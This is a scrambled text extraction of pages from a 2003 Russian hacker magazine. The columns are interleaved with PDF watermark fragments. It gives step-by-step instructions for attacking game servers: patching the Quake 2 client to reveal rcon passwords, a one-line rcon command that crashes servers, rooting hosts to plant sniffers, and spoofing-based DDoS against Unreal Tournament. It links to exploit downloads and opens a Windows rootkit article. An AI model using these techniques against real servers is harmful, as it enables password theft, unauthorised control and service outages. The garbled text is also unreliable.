и DDoS-атаки. Что ж, поехали!

 

логи и вытаскивать этот искомый пасс. Если же

ки, было обнаружено, что сервер может не-

 

 

 

 

это тачка под Windows, то тут придется повторять

правильно обрабатывать различные запросы.

 

 

QUAKE

 

те же действия, только придется искать другой

И, естественно, результатом этой ошибки

 

 

 

софт. Только он не должен ничего выводить на

стала возможность получить rcon пароль. Как

 

 

 

 

 

 

Первая квака не особо выделяются своими глю-

 

экран, а то админ тачки заметит неладное.

же это делается? Для начала необходимо ска-

 

 

 

Второй Quake наличием ошибок радует гораз-

чать сорсы ку2 (брать с www.idsoftware.com).

 

 

кастостями. В ней нет явного получения доступа

 

 

 

 

 

 

Далее открыть проект в Visual C++, перейти к

 

 

к серверу через rcon. Отсутствуют необычные

 

 

 

 

 

 

 

 

файлу qcommon/cmd.c и в нем поменять

 

 

способы завалить сервер DoS-атакой, присущей

 

 

 

 

 

 

 

 

строку "Cmd_TokenizeString (text, true);" на

 

 

именно q1. Но не стоит огорчаться, эта квака от-

 

 

 

 

 

 

 

 

"Cmd_TokenizeString(text, false);". Пересо-

 

 

лично "лечится" любой DoS или DDoS-атакой, ес-

 

 

 

 

 

 

 

 

брать клиента, после чего получится новый

 

 

ли в итоге суммированный канал будет в два ра-

 

 

 

 

 

 

 

 

файл quake2.exe. И что же теперь? А теперь

 

 

за шире канала сервера.

 

 

 

 

 

 

 

 

можно коннектиться на какой-нибудь сервер и

 

 

Каким же образом можно похакать данный сер-

 

 

 

 

 

 

 

 

вводить там такую строку: say $rcon_pass-

 

 

вер? Вот самый гиморный способ, но он, вероят-

 

 

 

 

 

 

 

 

word. После чего на экране отобразится па-

 

 

но, единственный. Если сервер работает под ли-

 

 

 

 

 

 

 

 

роль от сервера. Дело сделано.

 

 

нухом, а такое бывает очень часто, то нужно все-

 

 

 

 

 

 

 

 

Кстати, на этом безобразия не заканчиваются.

 

 

ми правдами и неправдами рутать данную маши-

 

 

 

 

 

 

 

 

После того, как получишь пароль, можно зава-

 

 

ну. Главное тут - получить права рута на удален-

 

 

 

 

 

 

 

 

лить сам сервер. Причем делается это всего од-

 

 

 

Вытаскиваем пароли из кваки

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

1

 

2

 

3

 

4

 

62

 

Ньюсы

Феррум

Inside

PC_Zone

Взлом

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

 

 

C

 

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

-

 

 

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

i

 

 

 

 

 

 

F

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

t

 

P

D

 

 

 

 

 

 

 

 

o

 

 

 

 

 

D

063>

 

 

 

 

o

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

BUY

NOW!

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

NOW!

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

m

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

o

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

 

 

Ettercap è Ethereal

w

 

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

.

 

 

 

 

 

 

 

 

.c

 

 

 

p

df

 

 

 

 

e

 

 

 

 

p

df

 

 

 

 

 

e

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

ной строчкой: rcon map ../sdfkjslfj. После этой

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

команды сервер не найдет искомую карту и уй-

 

Это два очень распространенных и навороченных снифера. Чем же они так выделяются? Во-пер-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дет в даун. Вот! И эта ошибка присуща вообще

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вых, тем, что они просто удобные и с кучей возможностей. А именно: различные фильтры, удобные

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

всем версиям q2.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ГУИ, мультиплатформенность. Но это не главное. Оба они отличаются поддержкой очень многих

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

протоколов. Если есть необходимость вытащить пароли из какой-нибудь игры, программы, напри-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

мер, icq, то совсем необязательно разглядывать все пакеты в отдельности. Сниферы все сделают

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

за тебя. А чтобы ты окончательно ими проникся, вот тебе небольшой список поддерживаемых про-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

токолов ettercap: TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Официальные сайты: http://ettercap.sourceforge.net; http://www.ethereal.com

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Глюк с обработкой rcon строки

вера на заслуженный отдых, и возможность

Эксплоит брать здесь:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

И в завершение немного поговорим о ку3. Так

удобного воровства паролей при помощи снифе-

http://www.securitylab.ru/?ID=29363

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ра. Но обо всем по порядку.

 

P.S. Кстати данный эксплоит разбирался в но-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

как его исходные коды id еще не выложила, то

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Из DoS-атак, которые возможно провести с сер-

ябрьском номере "Хакера" в рубрике "Кодинг".

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

тут все довольно тихо. Есть парочка си-про-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вером, стоит выделить только две. Самая класс-

Так что, кому интересно узнать подробности, от-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

грамм, реализующих некоторые ошибки в сер-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ная из них приводит к абсолютной заполненности

крывайте свои неподъемные архивы.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вере. И все они DoS-атаки. Взять их можно с

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

игрового сервера, так что никто не может прикон-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

www.securitylab.ru по запросу quake. В частно-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нектиться и начать игру. Причем данная ошибка

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

сти, эксплоит q3dos.c вводит q3-сервер вер-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

присуща всем версиям серверов Half-Life. И плюс

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

сии 1.29f и 1.29g в глубокий даун путем со-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ко всему - эксплоит распространяется в двух ва-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

здания множественных соединений.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

риантах. Это и сорсы для линуксоидов, и бинар-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Но это DoS-атаки, а вот для получения пароля

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ники для любителей win-систем.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

для rcon придется опять воспользоваться снифе-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Второй сплоит более специфичный. Он предназ-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

рами. Тут пригодится все тот же ethereal или

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

начен для Half-Life Dedicated Server версии

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ettercap. Также ограничиваем фильтр на скан тра-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

3.1.3.х. Ошибка находится в обработке rcon ко-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

фика quake3. Потом дожидаемся появления ад-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

манды, что может привести к полному уходу сер-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

мина, который что-нибудь порконит, после чего

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вера в даун. Но самое интересное то, что это мо-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

чекаем файл с логами.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

жет выполнить абсолютно любой игрок - ведь для

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://www.securitylab.ru/?ID=26237 - DoS-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

этого не надо знать пароль админа. Главное -

Шард ультимы может завалить всего

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

атака на Quake3 сервер.

иметь в наличии *nix систему.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

один пользователь

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://www.securitylab.ru/?ID=26245 - åùå

И напоследок, несколько слов о добыче пароля

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

одна DoS-атака.

для rcon'а. Тут также придется хакать сервер с

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дальнейшей установкой снифера. Ставить необ-

ОБЩИЕ МЕТОДЫ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

UNREAL TOURNAMENT

ходимо ettercap, так как он понимает half-life про-

Все вышесказанное - лишь частные случаи для

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

токол. Далее по тексту - ожидание админа и чека-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Анрил на фоне своего соперника квэйка выгля-

нье файлов на пароль. Вот и все.

 

конкретных игровых серверов. Но что же делать,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

когда под прицелом находится сервер другой иг-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дит вообще ангелом. Никаких серьезных оши-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ры? Выход есть, и он очень прост: DoS и DDoS-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

бок, приводящих к уходу сервера в глубокий

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

атаки. Естественно, с ними не получится узнать па-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

лаг/даун, получению администраторских прав, в

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

роль от сервера, тут единственный исход - сервер

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

нем нет. Зато есть кое-что другое, что приво-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

в дауне. Но и это уже немало. Так вот, какие же

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дит к неплохим DDoS-атакам. Т.е. в данном

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

здесь атаки применяются. Очень эффективной бу-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

случае сервер выступает в роли атакующего :).

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

дет dns-udp-ip spoofing. Она как раз описывалась в

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Но это даже не ошибка сервера, а так, побоч-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

декабрьском номере ][, так что не будем на ней

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ный эффект установления соединения с новым

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

подробно останавливаться. А вообще, это уникаль-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

клиентом. Отчего так? Просто если послать

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ная в своем роде атака. Ей не то что игровой сер-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

спуфенный запрос на соединение, то в ответ

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вер валить, ей можно уронить и долго держать в

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

придет пакет в несколько раз больше начально-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

таком состоянии провайдера :). Другой способ -

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

го. В итоге можно создать неплохие DDoS-ата-

Half-Life и Counter-Strike очень даже

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

это обычный icmp/igmp/udp флуд с мощного кана-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ки с обратным адресом сервера UT.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

подвержены DoS-атакам

 

ла. Главный довод в такой атаке - канал атакующе-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

С паролем от сервера немного труднее. Ника-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://online.securityfocus.com/data/vulnerabili-

го шире канала жертвы. Жертва (в данном случае -

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ких специальных сниферов для UT обнаружено

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

игровой сервер) просто захлебнется от большого

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

не было. Значит, придется пользоваться уни-

ties/exploits/hl-rcon.c - эксплоит для отправле-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

потока пакетов. Примеры программ, реализующих

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

версальным методом: ставить любой снифак,

íèÿ â äàóí Half-Life Dedicated Server 3.1.3.õ.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

DoS и DDoS-атаки можно посмотреть здесь:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

включать фильтровку пакетов на 7778 порт

http://online.securityfocus.com/data/vulnerabili-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://packetstormsecurity.com/DoS/

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

(порт для запросов к серверу) и опять ждать

ties/exploits/hl.zip - DoS-атака на Half-Life сер-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://packetstormsecurity.com/distributed/

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

появления админа.

вера вплоть до версий 1.1.1.0.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

http://online.securityfocus.com/data/vulnera-

 

ULTIMA ONLINE

 

На DoS и DDoS-атаках я и завершу этот неболь-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

bilities/exploits/ut.tgz - эксплоит для Unreal

 

 

шой обзор багов в игровых серверах. Единст-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Tournament Server 436.0

Ошибка наличествует в Menasoft SPHEREserver.

венное, что хочется добавить - не стоит злоупо-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

треблять найденными ошибками. Так очень

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Глюк происходит из-за отсутствия ограничений на

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

HALF-LIFE È COUNTER-STRIKE

просто прослыть эдаким говнючком, который

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

количество соединений, сделанных одним поль-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

только и делает, что портит время отдыха дру-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

зователем. Т.е. любой юзер может делать любое

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Half-Life, а, соответственно, и Counter-Strike

гим людям. Лучше просто изучить, проверить

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

количество коннектов до тех пор, пока не будут

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

глюк, немного посмеяться над игро-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вполне удовлетворяют своей глючностью. Здесь

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

исчерпаны все возможные. Уязвимость присутст-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ками и оставить их в покое. Кто знает

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

и DoS-атаки на сервер, приводящие к уходу сер-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

вует в версиях Menasoft SPHEREserver 0.99i-0.99f.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

- вдруг и ты окажешься на их месте?

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

5 Юниксоид 6 X-Стиль

7 Кодинг

8 Юниты

9 Quit>

 

 

 

 

 

 

63

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

P

 

 

 

 

 

 

 

 

i

 

 

 

 

D

 

 

<Page 064>

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

Взлом

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ЧТО ТАКОЕ WIN R00TKITS И ЧТО С НИМИ ДЕЛАТЬ

Stalsen (stalsen@real.xakep.ru)

http://trinux.atanor.ru (thanks to qpyHT)

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

ХАКЕР\¹49\Январь\2003

P D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

NOW!

o

Что такое win r00tkits

to

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-x cha

 

 

 

 

и что с ними делать

Успешное использование руткитовäëÿ NT/W2k

В этой статье мы погорим с тобой о руткитах для операционных систем NT/W2k. Согласись, эта, с позволения сказать, отрасль очень бурно развивается! Если еще год назад мы могли только наслаждаться альфа-версией одного единственного NT-руткита (и каждый ламерский админ знал, что при странном поведении системы следует набрать net stop _root_ :)), то сейчас ситуация в корне меняется в лучшую сторону!

ИСТОРИЯ И ПОЛИТИКА

Microsoft ревниво оберегает свое ПО от посягательств. Его лицензиям на текст, код, изображения(!), высказывания Билла Гейтса(!!!) нет конца... Все это обременяет программера, создавая очень тесные рамки для работы (даже легальной). Оффтопик: ты слышал о новой лицензионной политике микрософта? Теперь они имеют право на доступ к информации на компьютерах пользователей!!! И это не просто слова, кто знает, к чему это вообще приведет (сразу в голову лезут мысли о потайных ходах софтверного гиганта). И вот тебе еще для затравки: недавно на одном из Микрософтверных ftp-сервкаков интернета обнаружили приватные данные примерно о нескольких миллионах пользователей windows (включая их ад-

реса, номера телефонов и т.д.). Я советую тебе хорошенько над этим задуматься! Ладно, возвращаемся на землю, главная проблема - закрытые исходники. Если в unix-совмести- мых достаточно выискать сорс какого-нибудь login, добавить туда пару нужных строчек и скомпилировать, то в nt/w2k все обстоит ина- че - надо дизассемблировать (ну, или искать более оригинальные пути), что, во-первых, противозаконно, а точнее, "противолицензионно" (я по поводу дизассемблирования). Во-вторых, все это предполагает хорошие знания асма. А в третьих, сорсы на языках низкого уровня получаются куда длиннее. На первый взгляд кажется, что проприетарный софт (т.е. с закрытыми исходниками) в некотором роде защищает программы от недобросовестных рук, но это иллюзорная безо-

пасность, так как в реале код остается на том же уровне... Например, ты написал скрипт на С, автоматизирующий добавление новостей на сайте, выложил исходники, и вдруг по тупой оплошности твою пагу взломали... С одной стороны обидно, конечно, но с другой стороны - был найден баг. Ты получил опыт, а твои сорсы стали еще безопаснее. Что же касается проприетарного софта - исходники закрыты, и никто не знает что да как (мы даже не можем быть уверены в отсутствии потайных ходов!). Приходится полагаться на русское "авось". Мелкософт частенько не может выложить нормальные патчи (мда, хотя работают они быстро), и если вдруг кто-ни- будь найдет очередную дырку в IE, то тебе долго придется ждать официальных заплаток (если он конечно сообщит об этом в M$ :-)).

64 Ньюсы 1 Феррум 2 Inside

3 PC_Zone 4 Взлом

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

t

 

P

D

 

 

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

P

D

 

 

 

 

 

 

 

 

o

 

 

 

 

NOW!

r

 

 

 

 

 

 

 

 

 

 

 

NOW!

r

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

df

 

 

 

 

e

 

 

 

 

 

 

 

 

 

 

 

p

df

 

 

 

 

e

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

УКРЕПЛЯТЬСЯ ИЛИ НЕТ?

 

 

C:\YourDir>deploy.exe. Теперь в системе со-

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Стоит ли хакеру укрепляться на nt/2k машине?

здается скрытый TCP/IP стек(!), который со-

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

здает виртуальную машину с адресом

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Согласен, очень спорный вопрос... Unix - свое,

10.0.0.166 (естественно, такие фокусы будут

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

родное... А НТ? Она изначально создавалась как

корректно работать только в локальной сети).

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ОСь с графическим интерфейсом (gui встроен в

Берешь обычный телнет и коннектишься (порт

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

ядро!), возможности командной строки мини-

не имеет значения, если будет время, попро-

 

 

 

 

 

 
